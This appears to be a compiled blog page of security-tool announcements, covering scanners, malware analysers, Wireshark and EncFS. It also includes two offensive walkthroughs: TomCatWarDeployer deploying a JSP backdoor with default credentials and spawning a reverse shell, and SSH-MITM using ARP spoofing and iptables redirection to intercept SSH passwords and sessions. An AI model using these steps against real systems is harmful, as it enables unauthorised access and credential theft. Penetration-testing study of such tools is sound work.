NILI: A Tool For Network Scan, Man in the Middle, Protocol Reverse Engineering And Fuzzing

NILI: A Tool For Network Scan, Man in the Middle, Protocol Reverse Engineering And Fuzzing

Installing

Here is some Instructions for Installing Prerequisites, Select Proper Instructions for your Operating System.

Unix-like

1- Install Python3 and pip:

$ sudo apt-get install python3
$ sudo apt-get install python3-pip

2- Install Scapy:

$ cd /tmp
$ git clone https://github.com/phaethon/scapy

$ cd scapy
$ sudo python3 setup.py install

3- Install Netzob:

$ git clone https://dev.netzob.org/git/netzob
$ cd ./netzob/
$ sudo apt-get install python3 python3-dev python3-setuptools build-essential
$ python3 setup.py install
$ python3 -m pip install bintrees --upgrade

Windows

1- Install python3

2- Install Scapy:

2-1- Install Winpcap
2-2- Install Scapy3k

python -m pip install scapy-python3

3- Install Netzob

Download

RastLeak Tool To Automatic Leak Information Using Hacking With Search Engine

RastLeak: Tool to automatic leak information using Hacking with Search Engines

How to install

Install requirements with:

pip install -r requirements.txt

#How to use:

python rastleak.py

The last stable version is rastleak.py

$python rastleak.py -h

Usage: rastleak.py [-h] -d DOMAIN -o OPTION -n SEARCH -e EXT [-f EXPORT]

This script searchs files indexed in the main searches of a domain to detect a possible leak information

Optional Arguments:

-h, --help show this help message and exit

-d DOMAIN, --domain DOMAIN


The domain which it wants to search

-o OPTION, --option OPTION

                    Indicate the option of search
                  
                     1.Searching leak information into the target
                     2.Searching leak information outside target

-n SEARCH, --search SEARCH

                    Indicate the number of the search which you want to do

-e EXT, --ext EXT Indicate the option of display:

                     1-Searching the domains where these files are found
                     2-Searching ofimatic files

-f EXPORT, --export EXPORT

                    Indicate the type of format to export results.
                  
                     1.json (by default)
                     2.xlsx              

Download RastLeak

DMitry A Deepmagic Information Gathering Tool

DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU) Linux Command Line Application coded in C language.

DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more. The information are gathered with following methods:

• Perform an Internet Number whois lookup.
• Retrieve possible uptime data, system and server data.
• Perform a SubDomain search on a target host.
• Perform an E-Mail address search on a target host.
• Perform a TCP Portscan on the host target.
• A Modular program allowing user specified modules

Download and installation

DMitry can be downloaded by issuing following commands:

$ cd /data/src/
$ wget http://mor-pah.net/code/DMitry-1.3a.tar.gz


For installation, issue following commands:

$ tar xzvf DMitry-1.3a.tar.gz
$ cd DMitry-1.3a/
$ ./configure
$ make
$ sudo make install

Then optionally create a symbolic link to your /pentest/ directory:

$ mkdir -p /pentest/enumeration/dmitry/
$ ln -s /usr/local/bin/dmitry /pentest/enumeration/dmitry/dmitry

Use

help
DMitry help can be displayed by issuing:

$ dmitry --help

Download 

TomCatWarDeployer: Apache Tomcat Auto WAR Deployment And Pwning Penetration Testing Tool

TomCatWarDeployer: Apache Tomcat Auto WAR deployment & Pwning Penetration Testing Tool..

Apache Tomcat auto WAR deployment & pwning penetration testing tool.

What is it?

This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell (either via web gui, listening port binded on remote machine or as a reverse tcp payload connecting back to the adversary).

In practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love tomcat:tomcat ).

Usage

As simple as providing server's address with port, as a IP:PORT pair. Here goes the help:

user$ python tomcatWarDeployer.py --help

    tomcatWarDeployer (v. 0.3)
    Apache Tomcat 6/7 auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

Usage: tomcatWarDeployer.py [options] server

server    Specifies server address. Please also include port after colon.

Options:
  -h, --help     show this help message and exit

  General options:
    -v, --verbose       Verbose mode.
    -s, --simulate      Simulate breach only, do not perform any offensive
                        actions.
    -G OUTFILE, --generate=OUTFILE
                        Generate JSP backdoor only and put it into specified
                        outfile path then exit. Do not perform any
                        connections, scannings, deployment and so on.
    -U USER, --user=USER
                        Tomcat Manager Web Application HTTP Auth username.
                        Default="tomcat"
    -P PASS, --pass=PASS
                        Tomcat Manager Web Application HTTP Auth password.
                        Default="tomcat"

Connection options:
    -H RHOST, --host=RHOST
                        Remote host for reverse tcp payload connection. When
                        specified, RPORT must be specified too. Otherwise,
                        bind tcp payload will be deployed listening on 0.0.0.0
    -p PORT, --port=PORT
                        Remote port for the reverse tcp payload when used with
                        RHOST or Local port if no RHOST specified thus acting
                        as a Bind shell endpoint.
    -u URL, --url=URL   Apache Tomcat management console URL. Default:
                        /manager/
    -t TIMEOUT, --timeout=TIMEOUT
                        Speciifed timeout parameter for socket object and
                        other timing holdups. Default: 10
Payload options:
    -R APPNAME, --remove=APPNAME
                        Remove deployed app with specified name. Can be used
                        for post-assessment cleaning
    -X PASSWORD, --shellpass=PASSWORD
                        Specifies authentication password for uploaded shell,
                        to prevent unauthenticated usage. Default: randomly
                        generated. Specify "None" to leave the shell
                        unauthenticated.
    -T TITLE, --title=TITLE
                        Specifies head>title for uploaded JSP WAR payload.
                        Default: "JSP Application"
    -n APPNAME, --name=APPNAME
                        Specifies JSP application name. Default: "jsp_app"
    -x, --unload        Unload existing JSP Application with the same name.
                        Default: no.
    -C, --noconnect     Do not connect to the spawned shell immediately. By
                        default this program will connect to the spawned
                        shell, specifying this option let's you use other
                        handlers like Metasploit, NetCat and so on.
    -f WARFILE, --file=WARFILE
                        Custom WAR file to deploy. By default the script will
generate own WAR file on-the-fly.

And sample usage on Kevgir 1 VM by canyoupwn.me running at 192.168.56.100:8080 :

user$ python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080

    tomcatWarDeployer (v. 0.3)
    Apache Tomcat 6/7 auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to: 192.168.56.102:4449.
DEBUG: Browsing to "http://192.168.56.100:8080/manager/"... Creds: tomcat:tomcat
DEBUG: Apache Tomcat Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for jsp_app WAR at: 
"/tmp/tmpDhzo9I"
DEBUG: Working with Java at version: 1.8.0_60
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/jsp_app.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 547) (out= 253)(deflated 53%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)
adding: index.jsp(in = 4684) (out= 1595)(deflated 65%)
DEBUG: WAR file structure:
DEBUG: /tmp/tmpDhzo9I
├── files
│   ├── META-INF
│   │   └── MANIFEST.MF
│   └── WEB-INF
│       └── web.xml
└── index.jsp

3 directories, 3 files
WARNING: Application with name: "jsp_app" is already deployed.
DEBUG: Unloading existing one...
DEBUG: Unloading application: "http://192.168.56.100:8080/jsp_app/"
DEBUG: Succeeded.
DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpDhzo9I"
DEBUG: Succeeded, invoking it...
DEBUG: Spawned shell handling thread. Awaiting for the event...
DEBUG: Awaiting for reverse-shell handler to set-up
DEBUG: Establishing listener for incoming reverse TCP shell at 192.168.56.102:4449
DEBUG: Socket is binded to local port now, awaiting for clients...
DEBUG: Invoking application at url: "http://192.168.56.100:8080/jsp_app/"
DEBUG: Adding 'X-Pass: oHI9mPB0mOnZ' header for shell functionality authentication.
DEBUG: Incoming client: 192.168.56.100:54251
INFO: JSP Backdoor up & running on http://192.168.56.100:8080/jsp_app/
INFO: Happy pwning. Here take that password for web shell: 'oHI9mPB0mOnZ'
DEBUG: Connected with the shell: tomcat7@canyoupwnme

tomcat7@canyoupwnme $ id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)

tomcat7@canyoupwnme $ exit

The program will set-up a local listener for reverse-shell connection on the 192.168.56.102:4449 host (local host) as in the example above. Then, after invoking JSP Backdoor it will automatically connect with the local listener, resulting in shell being popped up. One can also skip -H parameter in order to go with bind shell functionality, whereas rather then setting local listener - the program will go and connect with remotely listening bind-shell.

Finally, the above invocation will result in the following JSP application accessible remotely via WEB:

JSP backdoor gui

As one can see, there is password needed for leveraging deployed backdoor, preventing thus unauthenticated access during conducted assessment.

Summing up, user has spawned WEB application providing WEB backdoor, authenticated via POST 'password' parameter that can be specified by user or randomly generated by the program. Then, the application upon receiving X-Pass header in the invocation phase, spawned reverse connection to our netcat handler. The HTTP header is being requested here in order to prevent user refreshing WEB gui and keep trying to bind or reverse connect. Also this makes use of authentication to reach that code.

That would be all I guess.

CHANGELOG

19.07.16: Version 0.3: Added bind-shell & Reverse-shell functionality to provide user with direct access to the shell.

TODO

1. Implement bind & reverse tcp payload functionality as well as some pty to interact with it
2. Finish implementing noconnect and connect functionality
3. Implement sort of communication authentication and encryption/encoding, to prevent flow of plain-text data through the wire/ether
4. Test it on tomcat8

Download

     

A2SV: Auto Scanning Tool To Find SSL Vulnerability

A2SV: Auto Scanning Tool To Find SSL Vulnerability

What is A2SV?
Its an Auto Scanning tool to find SSL Vulnerability and its featured with HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc

A. Support Vulnerability

[CVE-2014-0160] CCS Injection
[CVE-2014-0224] HeartBleed
[CVE-2014-3566] SSLv3 POODLE
[CVE-2015-0204] FREAK Attack
[CVE-2015-4000] LOGJAM Attack
[CVE-2016-0703] SSLv2 DROWN
B. Dev Plan

[PLAN] SSL ACCF

2. How to Install?

A. Download(clone) & Unpack A2SV

git clone https://github.com/hahwul/a2sv.git
cd a2sv
B. Install Python Package / OpenSSL

pip install argparse
pip install netaddr

apt-get install openssl
C. Run A2SV

python a2sv.py -h

3. How to Use?

usage: a2sv.py [-h] [-t TARGET] [-p PORT] [-m MODULE] [-v]

Optional arguments:
-h, --help            show this help message and exit
-t TARGET, --target TARGET
                      Target URL/IP Address
-p PORT, --port PORT  Custom Port / Default: 443
-m MODULE, --module MODULE
                      Check SSL Vuln with one module
                      [h]: HeartBleed
                      [c]: CCS Injection
                      [p]: SSLv3 POODLE
                      [f]: OpenSSL FREAK
                      [l]: OpenSSL LOGJAM
                      [d]: SSLv2 DROWN
-u, --update          Update A2SV (GIT)
-v, --version         Show Version

[Scan SSL Vulnerability]
python a2sv.py -t 127.0.0.1
python a2sv.py -t 127.0.0.1 -m heartbleed
python a2sv.py -t 127.0.0.1 -p 8111

[Update A2SV]
python a2sv.py -u
python a2sv.py --update

Download 

CuckooDroid - Automated Android Malware Analysis Tool

CuckooDroid - Automated Android Malware Analysis with Cuckoo Sandbox.

CuckooDroid is an extension of Cuckoo Sandbox the Open Source software for automating analysis of suspicious files, CuckooDroid brigs to cuckoo the capabilities of execution and analysis of android application.

CuckooDroid featured with VM-detection techniques, encryption key extraction, SSL inspection, API call trace, basic behavioural signatures. Also provides both static and dynamic APK inspection.

Installation - Easy integration script:

git config --global user.email "you@example.com"

 

 

git config --global user.name "Your Name"
git clone --depth=1 https://github.com/cuckoobox/cuckoo.git cuckoo -b 1.2
cd cuckoo
git remote add droid https://github.com/idanr1986/cuckoo-droid
git pull --no-edit -s recursive -X theirs droid master 
cat conf-extra/processing.conf >> conf/processing.conf
cat conf-extra/reporting.conf >> conf/reporting.conf
rm -r conf-extra
echo "protobuf" >> requirements.txt

Download

Pompem - Exploit and Vulnerability Finder Pentester Tool

Pompem - Exploit and Vulnerability Finder Pentester Tool

Pompem is an open source tool, designed to automate the search for Exploits and Vulnerability in the most important databases. 

Its's Developed in Python, has a system of advanced search, that help the work of pentesters and ethical hackers. In the current version, it performs searches in PacketStorm security, CXSecurity, ZeroDay, Vulners, National Vulnerability Database, WPScan Vulnerability Database.

Source code

You can download the latest tarball by clicking here or latest zipball by clicking here.

You can also download Pompem directly from its Git repository:

$ git clone https://github.com/rfunix/Pompem.git

Dependencies

Pompem works out of the box with Python 3.5 on any platform and requires the following packages:

Requests 2.9.1+

Installation

Get Pompem up and running in a single command:

$ pip3.5 install -r requirements.txt

Usage

To get the list of basic options and information about the project:

$ python3.5 pompem.py -h

Options:

  -h, --help              show this help message and exit
  -s, --search <keyword,keyword,keyword> text for search
  --txt                           Write txt File
  --html                          Write html File

Examples of use:

$ python3.5 pompem.py -s Wordpress
$ python3.5 pompem.py -s Joomla --html
$ python3.5 pompem.py -s "Internet Explorer,joomla,wordpress" --html
$ python3.5 pompem.py -s FortiGate --txt
$ python3.5 pompem.py -s ssh,ftp,mysql

Download 

A Simple Static Malware Analyzer SSMA Tool Written in Python 3

SSMA is a simple malware analyzer written in Python 3. 

Features: 

1. Analyze PE file’s header and sections (number of sections, entropy of sections/PE file, suspicious section names, suspicious flags in the characteristics of the PE file, etc.) 
2. Searches for possible domains, e-mail addresses, IP addresses in the strings of the file. 
3. Checks if domain is blacklisted based on abuse.ch’s Ransomware Domain Blocklist and malwaredomains.com’s blocklist. 
4. Looks for Windows functions commonly used by malware. 
5. Get results from VirusTotal and/or upload files. 
6. Malware detection based on Yara-rules 
7. Detect well-known software packers. 
8. Detect the existence of cryptographic algorithms. 
9. Detect anti-debug and anti-virtualization techniques used by malware to evade automated analysis. 
10. Find if documents have been crafted to leverage malicious code. 

Usage: 

git clone https://github.com/secrary/SSMA
cd SSMA
sudo pip3 install -r requirements.txt
python3 ssma.py -h
python3 ssma.py -k api-key file.exe

You can just statically scan the file or upload to VirustTotal using your API-KEY.

python3 ssma.py file.exe
python3 ssma.py -k api-key file.exe

Download

Wireshark 2.2.0 Announced With New Features And Bug Fixes

Wireshark is a free and open source packet analyzer. 

It is used for network troubleshooting, analysis, software and communications protocol development.
It formely known as Ethereal, Wireshark allows the user to put the network interface controllers for using Sniffing and can see all the live traffic on the Wireshark Interface.

New Bug Fixes

• Upgrading to latest version uninstalls Microsoft Visual C++ redistributable. (Bug 12712)
• Extcap errors not reported back to UI. (Bug 11892)

The following features are new (or have been significantly updated) since version 2.2.0rc2:

No major changes since 2.2.0rc2.

The following features are new (or have been significantly updated) since version 2.2.0rc1:

"Decode As" supports SSL (TLS) over TCP.

The following features are new (or have been significantly updated) since version 2.1.1:

Invalid coloring rules are now disabled instead of discarded. This will provide backward compatibility with a coloring rule change in Wireshark 2.2.

The following features are new (or have been significantly updated) since version 2.1.0:

• Added -d option for Decode As support in Wireshark (mimics TShark functionality)
• The Qt UI, GTK+ UI, and TShark can now export packets as JSON. TShark can additionally export packets as Elasticsearch-compatible JSON.
• The Qt UI now supports the -j, -J, and -l flags. The -m flag is now deprecated.
• The Conversations and Endpoints dialogs are more responsive when viewing large numbers of items.
• The RTP player now allows up to 30 minutes of silence frames.
• Packet bytes can now be displayed as EBCDIC.
• The Qt UI loads captures faster on Windows.
• proto_tree_add_checksum was added as an API. This attempts to standardize how checksums are reported and filtered for within *Shark. There are no more individual "good" and "bad" filter fields, protocols now have a "checksum.status" field that records "Good", "Bad" and "Unverified" (neither good or bad). Color filters provided with Wireshark have been adjusted to the new display filter names, but custom ones may need to be updated.

The following features are new (or have been significantly updated) since version 2.0.0:

• The intelligent scroll bar now sits to the left of a normal scroll bar and provides a clickable map of nearby packets.
• You can now switch between between Capture and File Format dissection of the current capture file via the View menu in the Qt GUI.
• You can now show selected packet bytes as ASCII, HTML, Image, ISO 8859-1, Raw, UTF-8, a C array, or YAML.

You can now use regular expressions in Find Packet and in the advanced preferences.

Name resolution for packet capture now supports asynchronous DNS lookups only. Therefore the "concurrent DNS resolution" preference has been deprecated and is a no-op. To enable DNS name resolution some build dependencies must be present (currently c-ares). If that is not the case DNS name resolution will be disabled (but other name resolution mechanisms, such as host files, are still available).

The byte under the mouse in the Packet Bytes pane is now highlighted.

• TShark supports exporting PDUs via the -U flag.
• The Windows and OS X installers now come with the "sshdump" and "ciscodump" extcap interfaces.
• Most dialogs in the Qt UI now save their size and positions.
• The Follow Stream dialog now supports UTF-16.
• The Firewall ACL Rules dialog has returned.
• The Flow (Sequence) Analysis dialog has been improved.
• We no longer provide packages for 32-bit versions of OS X.
• The Bluetooth Device details dialog has been added.

Source: Wireshark

EncFS: An Encrypted Filesystem In User Space

EncFS: an Encrypted Filesystem for FUSE

EncFS provides an encrypted filesystem in user-space. It runs in userspace, using the FUSE library for the filesystem interface. EncFS is open source software, licensed under the LGPL.

EncFS is now over 10 years old (first release in 2003). It was written because older NFS and kernel-based encrypted filesystems such as CFS had not kept pace with Linux development.

EncFS encrypts individual files, by translating all requests for the virtual EncFS filesystem into the equivalent encrypted operations on the raw filesystem.

Status

Over the last 10 years, a number of good alternatives have grown up. Computing power has increased to the point where it is reasonable to encrypt the entire filesystem of personal computers (and even mobile phones!). On Linux, ecryptfs provides a nice dynamically mountable encrypted home directory.

EncFS has been dormant for a while. It is cleaning up in order to try and provide a better base for a version 2, but whether EncFS flowers again depends upon community interest. In order to make it easier for anyone to contribute, it is moving a new home on Github.

Unique Features

EncFS has a few features still not found anywhere else (as of Dec 2014) that may be interesting to you.

Reverse mode

encfs --reverse provides an encrypted view of an unencrypted folder. This enables encrypted remote backups using standard tools like rsync.

Fast on classical HDDs

EncFS is typically much faster than ecryptfs for stat()-heavy workloads when the backing device is a classical hard disk. This is because ecryptfs has to to read each file header to determine the file size - EncFS does not. This is one additional seek for each stat. See PERFORMANCE.md for detailed benchmarks on HDD, SSD and ramdisk.

Download EncFS

MongoDB-HoneyProxy: A Honeypot Proxy For MongoDB Server

MongoDB-HoneyProxy: A Honeypot Proxy For MongoDB Server

When run, this will proxy and log all traffic to a dummy mongodb server. MongoDB-HoneyProxy was created in response to the 'MongoDB Apocolypse'

Pre-requisites:

• sudo apt-get install nodejs npm gcc g++
• You'll also need to install MongoDB for this to function, as this project works as a logging proxy.

Cyber Criminals Attacking On Web Databases And Asking To Pay For Ransom

Setup

• Create a MongoDB database. Some good dummy data can be found here. Another good tool is JSON Generator, which generates fake json that can then be converted to bson.
• Then, install the project

git clone https://github.com/Plazmaz/MongoDB-HoneyProxy.git

cd MongoDB-HoneyProxy
sudo npm install

To run the project, simply use node index.js

Download

Vulners: Software Vulnerability Scanner Plugin For Burp Suite Professional

Vulners scanner Plugin Released  For Automatic Vulnerability Detection In Passive Scan mode

vulnersCom/burp-vulners-scanner Vulnerability scanner based on vulners.com search API

Burp Suite scanner plugin based on Vulners.com vulnerability database API

• Search fingerprints in http response (inspired by plugin "Software Version Reporter") and check found version in vulners.com vulnerability database
• [Experemental] Check unique URLs in vulners.com finding exploits for such pathsIf Vulners Plugin detects vulnerable software it will show you CVE, advisoroies and even applicable exploits!
  
  
   

  Requirements

  • Burp Suite - Professional Edition
  • Java 1.7
  • Maven

   

  Installation

  • Clone repository
  • From command line run
  • mvn package
  • find burp-vulners-scanner.jar in /target folder
  • open Burp Suite -> Extender -> Add -> path to plugin.jar

  
  

  Build

  Ready to install build burp-vulners-scanner.jar
  
  Software Vulnerability scanner plugin for Burp Suite Professional
  Main functionality:
  

  • Detect vulnerable software by discovered fingerprints in HTTP responses
  • Check unique urls finding exploits with such paths

  Download Burp Suite Plugin

   

EAST: Exploits And Security Tools For Penetration Testing Framework

EAST: Exploits And Security Tools For Penetration Testing Framework

Pentest framework environment is the basis of IT security specialist’s toolkit. This software is essential as for learning and improving of knowledge in IT systems attacks and for inspections and proactive protection. 

The need of native comprehensive open source pen test framework with high level of trust existed for a long time. That is why EAST framework was created for native and native friendly IT security markets. EAST is a framework that has all necessary resources for wide range exploits to run, starting from Web to buffer overruns. EAST differs from similar toolkits by its ease of use. Even a beginner can handle it and start to advance in IT security.

Main features:

• Framework security. Software used for IT security must have a high level of user trust. Easy to check open source Python code realized in EAST. It is used for all parts of the framework and modules. Relative little amount of code eases its verification by any user. No OS changes applied during software installation.
• Framework maximum simplicity. Archive downloads, main python script start.py launches, which allows exploits start-stop and message traffic. All handled local or remotely via browser.
• Exploits simplicity of creation and editing. Possibility to edit and add modules and exploits on the fly without restart. Module code body is easy and minimal in terms of amount.
• Cross-platform + minimal requirements and dependencies. Tests for Windows and Linux. Should function everywhere where Python is installed. Framework contains all dependencies and does not download additional libraries.
• Full capacity of vanilla pen test framework. In spite of simplicity and
• “unoverload” the framework has all necessary resources for wide range exploits to run, starting from Web to buffer overruns.
• Wide enhancement possibilities. Third party developers can create their own open source solutions or participate in EAST development by use of Server-client architecture, message traffic API and support libraries. 
•  
•  
• 2. Requirements
• Python 2

3. Usage

git clone https://github.com/C0reL0ader/EaST && cd EaST
python start.py [-p PORT] [--all-interfaces]

Download EAST

•  

SSH Man-In-The-Middle Penetration Testing Tool

SSH Man-In-The-Middle Penetration Testing Tool

This penetration testing tool allows an auditor to intercept SSH connections. 

A patch applied to the OpenSSH v7.5p1 source code causes it to act as a proxy between the victim and their intended SSH server; all plaintext passwords and sessions are logged to disk.

Of course, the victim's SSH client will complain that the server's key has changed. But because 99.99999% of the time this is caused by a legitimate action (OS re-install, configuration change, etc), many/most users will disregard the warning and continue on.

NOTE: Only run the modified sshd in a VM or container! Ad-hoc edits were made to the OpenSSH sources in critical regions, with no regard to their security implications. Its not hard to imagine these edits introduce serious vulnerabilities. Until the dependency on root privileges is removed, be sure to only run this code on throw-away VMs/containers.

To Do

This is the first release of this tool. While it is very useful as-is, there are nevertheless things to improve:

• Support SFTP MITM'ing.
• Add port forwarding support.
• Remove dependency on root privileges.
• Create wrapper script that detects when user is trying to use key authentication only, and de-spoof them automatically.

Initial Setup

1.) Install zlib and openssl headers:
sudo apt install zlib1g-dev libssl-dev

2.) Download OpenSSH v7.5p1 and verify its signature:
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/RELEASE_KEY.asc
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz.asc
gpg --import RELEASE_KEY.asc
gpg --verify openssh-7.5p1.tar.gz.asc openssh-7.5p1.tar.gz

3.) Unpack the tarball, patch the sources, and compile it:
tar xzf openssh-7.5p1.tar.gz
patch -p0 < openssh-7.5p1-mitm.patch
mv openssh-7.5p1 openssh-7.5p1-mitm; cd openssh-7.5p1-mitm; ./configure --with-sandbox=no && make -j 10

4.) Create keys and setup environment:
sudo ssh-keygen -t ed25519 -f /usr/local/etc/ssh_host_ed25519_key < /dev/null
sudo ssh-keygen -t rsa -b 4096 -f /usr/local/etc/ssh_host_rsa_key < /dev/null
sudo useradd -m sshd && sudo useradd -m bogus && sudo chmod 0700 ~sshd ~bogus
sudo mkdir /var/empty; sudo cp ssh ~bogus/

Running The Attack

1.) Run sshd:
cd /path/to/openssh-7.5p1-mitm
sudo $PWD/sshd -f $PWD/sshd_config

2.) Enable IP forwarding:
sudo bash -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo iptables -P FORWARD ACCEPT

3.) Allow connections to sshd and re-route forwarded SSH connections:
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 22

4.) ARP spoof a target(s) (Protip: do NOT spoof all the things! Your puny network interface won't likely be able to handle an entire network's traffic all at once. Only spoof a couple IPs at a time):
arpspoof -r -t 192.168.x.1 192.168.x.5

5.) Monitor auth.log. Intercepted passwords will appear here:
sudo tail -f /var/log/auth.log

6.) Once a session is established, a full log of all input & output can be found in /home/bogus/session_*.txt.

Sample Results

Upon success, /var/log/auth.log will have lines that log the password, like this:

May 16 23:14:01 showmeyourmoves sshd[16798]: INTERCEPTED PASSWORD: hostname: [10.199.30.x]; username: [jdog]; password: [supercalifragilistic] [preauth]

Furthermore, the victim's entire SSH session can be found in/home/bogus/session_*.txt:

# cat /home/bogus/session_0.txt
Last login: Tue May 16 21:35:00 2017 from 10.50.22.x
OpenBSD 6.0-stable (GENERIC.MP) #12: Sat May  6 19:08:31 EDT 2017

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest version of the code.  With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

jdog@jefferson ~ $ ppss
PID TT  STAT       TIME COMMAND
59264 p0  Ss      0:00.02 -bash (bash)
52132 p0  R+p     0:00.00 ps
jdog@jefferson ~ $ iidd
uid=1000(jdog) gid=1000(jdog) groups=1000(jdog), 0(wheel)
jdog@jefferson ~ $ sssshh  jjtteessttaa@@mmaaggiiccbbooxx
jtesta@magicbox's password: ROFLC0PTER!!1juan

Note that the characters in the user's commands appear twice in the file because the input from the user is recorded, as well as the output from the shell (which echoes characters back). Observe that when programs like sudo and ssh temporarily disable echoing in order to read a password, duplicate characters are not logged.

Download SSH-MITM